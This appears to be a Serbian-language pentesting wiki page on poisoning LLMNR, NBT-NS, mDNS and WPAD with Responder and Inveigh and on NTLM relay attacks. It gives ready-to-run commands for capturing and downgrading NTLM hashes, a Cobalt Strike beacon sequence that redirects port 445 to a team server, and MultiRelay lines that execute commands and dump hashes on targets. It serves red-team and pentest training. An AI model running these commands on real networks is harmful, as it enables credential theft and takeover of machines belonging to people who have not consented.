Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

Mrežni protokoli

Protokoli za lokalno rešavanje imena domaćina

• LLMNR, NBT-NS i mDNS:

• Microsoft i drugi operativni sistemi koriste LLMNR i NBT-NS za lokalno rešavanje imena kada DNS ne uspe. Slično tome, Apple i Linux sistemi koriste mDNS.

• Ovi protokoli su podložni presretanju i falsifikovanju zbog njihove neautentifikovane, emitovane prirode preko UDP-a.

• Responder se može koristiti za predstavljanje usluga slanjem lažnih odgovora na hostove koji upituju ove protokole.

• Više informacija o predstavljanju usluga korišćenjem Responder-a možete pronaći ovde.

Protokol za automatsko otkrivanje veb proxy-ja (WPAD)

• WPAD omogućava pretraživačima automatsko otkrivanje podešavanja proxy servera.

• Otkrivanje se olakšava putem DHCP-a, DNS-a, ili prelaskom na LLMNR i NBT-NS ako DNS ne uspe.

• Responder može automatizovati napade WPAD-om, usmeravajući klijente ka zlonamernim WPAD serverima.

Responder za trovanje protokola

• Responder je alat koji se koristi za trovanje LLMNR, NBT-NS i mDNS upita, selektivno odgovarajući na vrste upita, uglavnom ciljajući SMB servise.

• Dolazi preinstaliran u Kali Linux-u, konfigurabilan na lokaciji /etc/responder/Responder.conf.

• Responder prikazuje uhvaćene hešove na ekranu i čuva ih u direktorijumu /usr/share/responder/logs.

• Podržava IPv4 i IPv6.

• Windows verzija Responder-a je dostupna ovde.

Pokretanje Responder-a

• Za pokretanje Responder-a sa podrazumevanim podešavanjima: responder -I <Interfejs>

• Za agresivnije sondiranje (sa potencijalnim sporednim efektima): responder -I <Interfejs> -P -r -v

• Tehnike za hvatanje NTLMv1 izazova/odgovora radi lakšeg dešifrovanja: responder -I <Interfejs> --lm --disable-ess

• Impersonacija WPAD-a može se aktivirati sa: responder -I <Interfejs> --wpad

• NetBIOS zahtevi mogu se rešiti ka IP adresi napadača, i može se postaviti autentifikacioni proksi: responder.py -I <interfejs> -Pv

Trovanje DHCP-a sa Responder-om

• Falsifikovanje DHCP odgovora može trajno otrovati informacije o rutiranju žrtve, nudeći prikriveniju alternativu ARP trovanju.

• Zahteva precizno poznavanje konfiguracije ciljne mreže.

• Pokretanje napada: ./Responder.py -I eth0 -Pdv

• Ovaj metod može efikasno uhvatiti NTLMv1/2 hešove, ali zahteva pažljivo rukovanje kako bi se izbegla prekida mreže.

Hvatanje akreditacija sa Responder-om

• Responder će se predstavljati kao usluge koristeći pomenute protokole, hvatajući akreditacije (obično NTLMv2 Izazov/Odgovor) kada korisnik pokuša da se autentifikuje protiv falsifikovanih usluga.

• Mogu se preduzeti pokušaji da se smanji na NetNTLMv1 ili onemogući ESS radi lakšeg dešifrovanja akreditacija.

Važno je napomenuti da primena ovih tehnika treba da se obavlja legalno i etički, obezbeđujući odgovarajuću autorizaciju i izbegavajući prekide ili neovlašćen pristup.

Inveigh

Inveigh je alat za testere penetracije i crvene timove, dizajniran za Windows sisteme. Nudi funkcionalnosti slične Responder-u, izvodeći falsifikovanje i napade čoveka u sredini. Alat se razvio iz PowerShell skripte u C# binarni, sa Inveigh i InveighZero kao glavnim verzijama. Detaljni parametri i instrukcije mogu se pronaći u wiki.

Inveigh se može koristiti putem PowerShell-a:

Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y

Ili izvršen kao C# binarni fajl:

Inveigh.exe

NTLM Relay Napad

Ovaj napad koristi SMB autentikacione sesije kako bi pristupio ciljnom računaru, dodeljujući sistemsku ljusku ako je uspešan. Ključni preduslovi uključuju:

• Autentifikacioni korisnik mora imati lokalni Admin pristup na preusmerenom hostu.

• SMB potpisivanje treba da bude onemogućeno.

Preusmeravanje i tuneliranje porta 445

U scenarijima gde direktno umrežavanje nije izvodljivo, saobraćaj na portu 445 treba preusmeriti i tunelirati. Alati poput PortBender pomažu u preusmeravanju saobraćaja sa porta 445 na drugi port, što je esencijalno kada je lokalni admin pristup dostupan za učitavanje drajvera.

Postavljanje i rad PortBender-a u Cobalt Strike-u:

Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)

beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080

# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop

Ostali alati za NTLM Relay napad

• Metasploit: Podešen sa proxy-jem, lokalnim i udaljenim detaljima hosta.

• smbrelayx: Python skripta za preusmeravanje SMB sesija i izvršavanje komandi ili implementaciju zadnjih vrata.

• MultiRelay: Alat iz Responder paketa za preusmeravanje određenih korisnika ili svih korisnika, izvršavanje komandi ili ispisivanje heševa.

Svaki alat može biti konfigurisan da radi preko SOCKS proxy-ja ako je potrebno, omogućavajući napade čak i sa indirektnim pristupom mreži.

Rad MultiRelay-a

MultiRelay se pokreće iz /usr/share/responder/tools direktorijuma, ciljajući određene IP adrese ili korisnike.

python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes

# Proxychains for routing traffic

Prisiljavanje NTLM prijava

U sistemu Windows možda ćete moći da prisilite neke privilegovane naloge da se autentifikuju na proizvoljnim mašinama. Pročitajte sledeću stranicu da biste saznali kako:

Reference

• https://intrinium.com/smb-relay-attack-tutorial/

• https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/

• https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/

• https://intrinium.com/smb-relay-attack-tutorial/

• https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html